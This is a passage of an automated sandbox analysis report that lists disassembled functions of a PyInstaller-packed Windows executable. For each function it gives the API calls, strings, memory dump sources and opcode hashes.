                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: OpenProcessToken.ADVAPI32 ref: 00007FF62CC78793
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetTokenInformation.ADVAPI32 ref: 00007FF62CC787B8
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetLastError.KERNEL32 ref: 00007FF62CC787C2
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetTokenInformation.ADVAPI32 ref: 00007FF62CC78802
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62CC7881E
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: CloseHandle.KERNEL32 ref: 00007FF62CC78836
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC7916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC79175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                              • Instruction ID: 5e4798eeac2ffc8ab57c50db14f613c81a7e613efd7e0007e22eed7f2adb0230
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57213C21B08A8282FE14AB15ED152FA6378EF887A0F444035EA4DD7796DF3CE949D742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction ID: bb1576f88803f31ef1732537805a7460079237122d8620a9963275537cd811d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC31F633B18A8152EB209769AC506F762A5FF887E8F404132EE8DD7759EF3CD54A8301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62CC71B99), ref: 00007FF62CC72760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction ID: 1457340799cb50ff6dbfa9567e56d04423e5b2a8f7efdac5b2c88c96a9133c2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A219F32B18B8192EA20DB59FC517E663A4FB883E4F404132EE8C97659DF3CD2498741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: 07b66756d860e6a00321df7a4c2dc61a50186ec795e5f134d52ede683c53e023
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8918132B08A4645EF66AE29D850BBF36B1AB40BE4F444335DA5AC73D6DF3CE4458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction ID: 21bbfdc4fa60d17526116b583176e3885801a3bbe3f33e284f4aab1bed00e6c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A451A132B196028ADF14DF19D844A3877B9FB44BA8F108131DA4E8B788EF3CE845D741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction ID: 71abcc4a0febba02130c528a847957e0da1846a5304bbb3aa2e0e1e6892a3284
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F619672A08BC586DB608B19E8803A9B7A4FB857E4F044225EB9C8B755DF7CD194DB01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF62CC7352C,?,00000000,00007FF62CC73F23), ref: 00007FF62CC77F22
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                              • Instruction ID: ce0b23117cffd9741204111f3d758072f330bca0d4929f9d4084e34202f3c580
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9731D661719AC545FF218B29EC503AA6378EF84BF4F044231EA6D8BBC9DE2CD649D701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction ID: 24a560f3479708726e57acc49923e0921f0c0e9960ba8f992fff7ca860bd29c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6821DE73B08B4192EB209B19F8447EA63B4FB88794F404136EE8D9776ADE3CD249C741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction ID: d8d26d22b35318288283e7525eb07668d1e85dade767e9df46366f2c9971b01a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D11472B19A818AEB11CF69D8406ED37B1FB447E8B448236DE5ED7B89DE38D046C341
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D0EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D177
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction ID: 77335aec0e42fd1705b22e2900202b89684c68aab3852969dafa40764a352c3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B919472F1865295FB519F699C40ABE2BB0AF44BE8F144239DE0ED7685DF38D4828701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: 9e3e78a9366c6c5261d8b800243136ec92a4df68d373ed967d5fba4a87944466
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2251D372F081128AFF25DF289D55ABD27B1AB407B8F504235DE1ED2AE5DF39A4428701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction ID: 29793d33bfc6032f87cb60117973c068b6ae1cb61288d16ba602b48e55620ad9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D516D62F086418AFF11DF79D8507BE23B2AB48BA8F148635DE4D9B689DF78D4418702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: cd2147f3bebf089ffe8f942daa7e0d08e6bf949f80addf632e2bc888a597300d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B411AC31F1C14282FE54976DED4427952B5FF857A4F448030DB498BB9DCD2DD899A602
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction ID: 30a86eb453e76a9721887be65965a5b17c55db779209dd1300800f92d1fe55ff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F113A32B14F058AEF008F65EC542B933B4FB59B68F040E35DA6D867A4DF38D1658342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC890B6
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62CC7CC15), ref: 00007FF62CC890D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
